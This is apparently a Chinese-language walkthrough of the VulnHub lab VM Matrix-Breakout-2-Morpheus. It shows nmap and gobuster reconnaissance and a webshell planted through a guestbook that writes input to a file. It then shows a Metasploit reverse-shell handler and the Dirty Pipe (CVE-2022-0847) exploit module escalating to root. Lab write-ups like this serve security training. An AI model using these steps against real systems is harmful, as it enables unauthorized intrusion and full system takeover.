Matrix-Breakout-2-Morpheus

靶机说明

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

主机探测

┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
└─$ sudo nmap -sn 192.168.1.0/24 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:33 CST
Nmap scan report for 192.168.1.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00023s latency).
MAC Address: 00:50:56:E8:96:F1 (VMware)
Nmap scan report for 192.168.1.6
Host is up (0.00042s latency).
MAC Address: 00:0C:29:47:20:8B (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.0018s latency).
MAC Address: 00:50:56:EF:22:46 (VMware)
Nmap scan report for 192.168.1.5
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.00 seconds

nmap扫描

（1）进行端口扫描

┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.1.6 -oA nmapscan/ports           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:34 CST
Nmap scan report for 192.168.1.6
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
81/tcp open  hosts2-ns
MAC Address: 00:0C:29:47:20:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds

• 开放端口22,80和81
  （2）对端口细节进行扫描

  ┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
  └─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80,81 192.168.1.6 -oA nmapscan/detail
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:35 CST
  Nmap scan report for 192.168.1.6
  Host is up (0.00076s latency).
  
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
  80/tcp open  http    Apache httpd 2.4.51 ((Debian))
  81/tcp open  http    nginx 1.18.0
  MAC Address: 00:0C:29:47:20:8B (VMware)
  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  Aggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
  No exact OS matches for host (test conditions non-ideal).
  Network Distance: 1 hop
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 23.03 seconds

• 22端口是ssh服务，80端口是Apache服务，81端口是Nginx
  （3）进行UDP扫描

  ┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
  └─$ sudo nmap -sU -p22,80,81 192.168.1.6 -oA nmapscan/udp                          
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:36 CST
  Nmap scan report for 192.168.1.6
  Host is up (0.00094s latency).
  
  PORT   STATE  SERVICE
  22/udp closed ssh
  80/udp closed http
  81/udp closed hosts2-ns
  MAC Address: 00:0C:29:47:20:8B (VMware)
  
  Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds

• 端口没有开放UDP
  （4）进行漏洞扫描

  ┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
  └─$ sudo nmap --script=vuln -p22,80,81 192.168.1.6 -oA nmapscan/vuln
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:37 CST
  Nmap scan report for 192.168.1.6
  Host is up (0.00068s latency).
  
  PORT   STATE SERVICE
  22/tcp open  ssh
  80/tcp open  http
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  | http-enum: 
  |_  /robots.txt: Robots file
  81/tcp open  hosts2-ns
  MAC Address: 00:0C:29:47:20:8B (VMware)
  
  Nmap done: 1 IP address (1 host up) scanned in 44.30 seconds

• 在80端口下，发现一个robot.txt文件

web渗透

80端口渗透

（1）访问80端口，是一个静态页面，提示了ssh的权限

（2）进行目录扫描

┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
└─$ sudo gobuster dir -u http://192.168.1.6 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/index.html           (Status: 200) [Size: 348]
/.html                (Status: 403) [Size: 276]
/javascript           (Status: 301) [Size: 315] [--> http://192.168.1.6/javascript/]
/robots.txt           (Status: 200) [Size: 47]
/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

（3）访问robot.txt，提示没有任何东西

（4）访问graffiti.txt，有相关的提示信息

（5）访问graffiti.php，找到一个留言框

web渗透

（1）随便发送数据，进行尝试，发现提交后，会显示在当前页面

（2）查看数据包，发现提交的内容写入到了graffiti.txt文件中

（3）尝试写入一个webshell，另保存为一个php文件

（4）使用哥斯拉进行连接，成功进入

（5）使用模块PMeterpreter进行稳定反弹shell

msf6 >  use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (39927 bytes) to 192.168.1.6
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.6:47686) at 2025-02-10 16:26:51 +0800

meterpreter > 

提权-dirtypipe

（1）使用脚本linux-exploit-suggester.sh查看哪些可以进行提权，将脚本上传至临时目录

meterpreter > upload linux-exploit-suggester.sh /tmp/1.sh
[*] Uploading  : /miao/vulnhub/matrix-breakout-2-morpheus/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Uploaded -1.00 B of 88.80 KiB (-0.0%): /miao/vulnhub/matrix-breakout-2-morpheus/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Completed  : /miao/vulnhub/matrix-breakout-2-morpheus/linux-exploit-suggester.sh -> /tmp/1.sh
meterpreter > shell
Process 1105 created.
Channel 1 created.
cd /tmp
chmod +x 1.sh
./1.sh

（2）寻找到可能存在的漏洞利用

（3）寻找可利用的脚本

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search dirtypipe

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/local/cve_2022_0847_dirtypipe  2022-02-20       excellent  Yes    Dirty Pipe Local Privilege Escalation via CVE-2022-0847


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/cve_2022_0847_dirtypipe                               

（4）使用该脚本进行提权

msf6 exploit(multi/handler) > use exploit/linux/local/cve_2022_0847_dirtypipe 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > sessions

Active sessions
===============

  Id  Name  Type                   Information          Connection
  --  ----  ----                   -----------          ----------
  1         meterpreter php/linux  www-data @ morpheus  192.168.1.5:4444 -> 192.168.1.6:47686 (192.
                                                        168.1.6)

msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 0.0.0.0:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: php
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.daigaaizfky /bin/passwd'
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 192.168.1.5:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: php
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.spwuydueg /bin/passwd'
[*] Sending stage (3045380 bytes) to 192.168.1.6
[+] Deleted /tmp/.spwuydueg
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.6:47730) at 2025-02-10 16:35:44 +0800
meterpreter > 

（5）成功提权到root

meterpreter > getuid
Server username: root

查看flag

meterpreter > shell
Process 2917 created.
Channel 1 created.
cat /root/FLAG.txt
You've won!

Let's hope Matrix: Resurrections rocks!

总结

（1）主要就是一个web逻辑的渗透
（2）提权msf一键梭哈